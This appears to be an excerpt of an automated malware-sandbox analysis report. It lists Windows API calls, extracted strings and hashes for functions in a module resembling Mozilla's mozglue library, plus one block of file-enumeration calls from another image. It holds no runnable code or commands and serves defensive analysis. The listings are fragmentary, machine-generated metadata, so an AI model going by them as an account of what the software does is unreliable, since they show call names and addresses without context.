                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6855E6
                                    • ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C685606
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C685616
                                      • Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
                                      • Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1
                                    • GetCurrentThreadId.KERNEL32 ref: 6C68563E
                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C685646
                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C68567C
                                    • free.MOZGLUE(?), ref: 6C6856AE
                                      • Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
                                      • Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
                                      • Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6856E8
                                    • GetCurrentThreadId.KERNEL32 ref: 6C685707
                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C68570F
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C685729
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C68574E
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C68576B
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C685796
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6857B3
                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6857CA
                                    Strings
                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C685AC9
                                    • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C685717
                                    • MOZ_PROFILER_STARTUP, xrefs: 6C6855E1
                                    • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C685724
                                    • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6857C5
                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C685B38
                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C68548D
                                    • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C685D1C
                                    • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C685766
                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C68584E
                                    • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C685749
                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6854B9
                                    • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C685C56
                                    • MOZ_BASE_PROFILER_HELP, xrefs: 6C685511
                                    • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C685D2B
                                    • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6857AE
                                    • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C685791
                                    • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C685D01
                                    • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C685CF9
                                    • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6856E3
                                    • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C685D24
                                    • GeckoMain, xrefs: 6C685554, 6C6855D5
                                    • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C685BBE
                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6854A3
                                    • [I %d/%d] profiler_init, xrefs: 6C68564E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                    • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                    • API String ID: 3686969729-1266492768
                                    • Opcode ID: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
                                    • Instruction ID: 2c3640683dd86a3f0621a85368176c7ad85a3fdc5b01776cda0ff575a2627e02
                                    • Opcode Fuzzy Hash: bc4fc1f6f4e794a296228b959f13cc39e8699cb4ce539d2cc5da9f8e1cb31d9f
                                    • Instruction Fuzzy Hash: 062223B09053009BFB009F65989465AB7F6AF8734CF04452AE96797B41E731C84ACB6F
                                    APIs
                                    • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C686CCC
                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D11
                                    • moz_xmalloc.MOZGLUE(0000000C), ref: 6C686D26
                                      • Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26
                                    • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C686D35
                                    • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C686D53
                                    • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C686D73
                                    • free.MOZGLUE(00000000), ref: 6C686D80
                                    • CertGetNameStringW.CRYPT32 ref: 6C686DC0
                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C686DDC
                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686DEB
                                    • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C686DFF
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C686E10
                                    • CryptMsgClose.CRYPT32(00000000), ref: 6C686E27
                                    • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C686E34
                                    • CreateFileW.KERNEL32 ref: 6C686EF9
                                    • moz_xmalloc.MOZGLUE(00000000), ref: 6C686F7D
                                    • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C686F8C
                                    • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C68709D
                                    • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C687103
                                    • free.MOZGLUE(00000000), ref: 6C687153
                                    • CloseHandle.KERNEL32(?), ref: 6C687176
                                    • __Init_thread_footer.LIBCMT ref: 6C687209
                                    • __Init_thread_footer.LIBCMT ref: 6C68723A
                                    • __Init_thread_footer.LIBCMT ref: 6C68726B
                                    • __Init_thread_footer.LIBCMT ref: 6C68729C
                                    • __Init_thread_footer.LIBCMT ref: 6C6872DC
                                    • __Init_thread_footer.LIBCMT ref: 6C68730D
                                    • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6873C2
                                    • VerSetConditionMask.NTDLL ref: 6C6873F3
                                    • VerSetConditionMask.NTDLL ref: 6C6873FF
                                    • VerSetConditionMask.NTDLL ref: 6C687406
                                    • VerSetConditionMask.NTDLL ref: 6C68740D
                                    • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C68741A
                                    • moz_xmalloc.MOZGLUE(?), ref: 6C68755A
                                    • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C687568
                                    • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C687585
                                    • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C687598
                                    • free.MOZGLUE(00000000), ref: 6C6875AC
                                      • Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
                                      • Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                    • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                    • API String ID: 3256780453-3980470659
                                    • Opcode ID: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
                                    • Instruction ID: 2422c8dc4d9a572f5e4a74baa2ee5fd10160f6e858a89d2492ba0624c01e92dd
                                    • Opcode Fuzzy Hash: f5c5682dc257ba5b62027e1fbcdfcb81fa2bf4a0b74f17c236b180f09efaa30a
                                    • Instruction Fuzzy Hash: 1252E5B1A012189FEB21CF65CC84BAA77F9EF46704F004199F529A7640DB70AF85CF69
                                    APIs
                                    • EnterCriticalSection.KERNEL32(?), ref: 6C6B0F1F
                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6B0F99
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6B0FB7
                                    • EnterCriticalSection.KERNEL32(?), ref: 6C6B0FE9
                                    • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C6B1031
                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6B10D0
                                    • EnterCriticalSection.KERNEL32(?), ref: 6C6B117D
                                    • memset.VCRUNTIME140(?,000000E5,?), ref: 6C6B1C39
                                    • EnterCriticalSection.KERNEL32(6C6FE744), ref: 6C6B3391
                                    • LeaveCriticalSection.KERNEL32(6C6FE744), ref: 6C6B33CD
                                    • LeaveCriticalSection.KERNEL32(?), ref: 6C6B3431
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3437
                                    Strings
                                    • <jemalloc>, xrefs: 6C6B3941, 6C6B39F1
                                    • : (malloc) Unsupported character in malloc options: ', xrefs: 6C6B3A02
                                    • Compile-time page size does not divide the runtime one., xrefs: 6C6B3946
                                    • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C6B3559, 6C6B382D, 6C6B3848
                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6B37A8
                                    • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6B37D2
                                    • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C6B3793
                                    • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6B37BD
                                    • MALLOC_OPTIONS, xrefs: 6C6B35FE
                                    • MOZ_CRASH(), xrefs: 6C6B3950
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                    • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                    • API String ID: 3040639385-4173974723
                                    • Opcode ID: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
                                    • Instruction ID: 0822ba19d3a49275f7f8fa28e7f1d0801e8a9593246d08842f387c7d75d6eaef
                                    • Opcode Fuzzy Hash: 3d47ea64b5e60ec0ba958f380313297de42d4eeac17864d25234720cd5f6b160
                                    • Instruction Fuzzy Hash: 7C53AF72A057019FC304CF29C580716FBE1BF89328F29C66DE869AB791D771E852CB85
                                    APIs
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3527
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D355B
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35BC
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D35E0
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D363A
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3693
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D36CD
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3703
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D373C
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3775
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D378F
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3892
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D38BB
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3902
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3939
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3970
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D39EF
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3A26
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3AE5
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3E85
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EBA
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D3EE2
                                      • Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C6D61DD
                                      • Part of subcall function 6C6D6180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C6D622C
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D40F9
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D412F
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4157
                                      • Part of subcall function 6C6D6180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C6D6250
                                      • Part of subcall function 6C6D6180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6D6292
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D441B
                                    • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6D4448
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D484E
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4863
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4878
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C6D4896
                                    • free.MOZGLUE ref: 6C6D489F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: floor$free$malloc$memcpy
                                    • String ID:
                                    • API String ID: 3842999660-3916222277
                                    • Opcode ID: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
                                    • Instruction ID: 1fc5096b9c47ae93ba167305b6364d55eea607932488f794de885e61bc2d754a
                                    • Opcode Fuzzy Hash: 16c303b84c9d71a64ab3d12022ed5208c692d5c7e7b5485fe28dae8c259428b1
                                    • Instruction Fuzzy Hash: BFF25D74908B808FC761CF29C08469AFBF1FFCA344F118A5ED99997711DB71A886CB46
                                    APIs
                                    • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C6864DF
                                    • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C6864F2
                                    • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C686505
                                    • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C686518
                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C68652B
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C68671C
                                    • GetCurrentProcess.KERNEL32 ref: 6C686724
                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C68672F
                                    • GetCurrentProcess.KERNEL32 ref: 6C686759
                                    • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C686764
                                    • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C686A80
                                    • GetSystemInfo.KERNEL32(?), ref: 6C686ABE
                                    • __Init_thread_footer.LIBCMT ref: 6C686AD3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AE8
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C686AF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                    • API String ID: 487479824-2878602165
                                    • Opcode ID: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
                                    • Instruction ID: 4ecc9554f54387ec0bd99ce1c134d618cbeb9c150f6b640fb5754b8f5f346cbc
                                    • Opcode Fuzzy Hash: e4baa4db70cb43ec8f51baeedc8ed62435e9ed57382cbbd13ef2c4e4829936cf
                                    • Instruction Fuzzy Hash: A5F103709162199FCF20CF25DC88BDAB7B5AF46308F1442D9D819A3680D731EE85CFA9
                                    APIs
                                    • wsprintfA.USER32 ref: 001933DC
                                    • FindFirstFileA.KERNEL32(?,?), ref: 001933F3
                                    • lstrcat.KERNEL32(?,?), ref: 00193445
                                    • StrCmpCA.SHLWAPI(?,001A0F40), ref: 00193457
                                    • StrCmpCA.SHLWAPI(?,001A0F44), ref: 0019346D
                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00193777
                                    • FindClose.KERNEL32(000000FF), ref: 0019378C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                    • Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                    • API String ID: 1125553467-2524465048
                                    • Opcode ID: 877bffbd439c09ddc8e1734a71863304949744898fefe1f10859c196332ed8a1
                                    • Instruction ID: 2e36212f8e732e72f3615755a41ae9c4b9ced5d7e02471dafe771ada0f52f8f3
                                    • Opcode Fuzzy Hash: 877bffbd439c09ddc8e1734a71863304949744898fefe1f10859c196332ed8a1
                                    • Instruction Fuzzy Hash: 81A14FB2A10208AFDF25DBA4DC85FEE737DBB59300F444588E51E96141EB74AB88CF61
                                    APIs
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC5F9
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DC6FB
                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC74D
                                    • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C6DC7DE
                                    • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C6DC9D5
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DCC76
                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DCD7A
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDB40
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB62
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DDB99
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DDD8B
                                    • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C6DDE95
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE360
                                    • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C6DE432
                                    • memcpy.VCRUNTIME140(?,?,?), ref: 6C6DE472
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true
                                    • Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                    Similarity
                                    • API ID: memset$memcpy
                                    • String ID:
                                    • API String ID: 368790112-0
                                    • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                    • Instruction ID: d966846b9019b01c1569232ee8d4dc98feab5bf0201caf535b8ac6994edd9795
                                    • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                    • Instruction Fuzzy Hash: 3A33BE71E0421A8FCB04CFA8C8806EDBBF2FF49304F2A4269D955AB755D731B945CBA4
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C69EE7A
                                    • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C69EFB5
